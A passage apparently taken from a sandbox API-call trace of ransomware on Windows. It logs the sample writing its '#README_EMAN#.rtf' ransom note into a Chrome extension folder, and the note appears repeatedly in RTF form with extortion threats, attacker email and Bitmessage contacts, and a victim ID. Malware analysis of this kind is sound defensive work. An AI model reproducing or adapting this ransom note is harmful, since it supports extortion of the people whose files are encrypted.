have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.322] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.323] CloseHandle (hObject=0x294) returned 1 [0272.323] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0272.323] GetLastError () returned 0x2 [0272.323] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 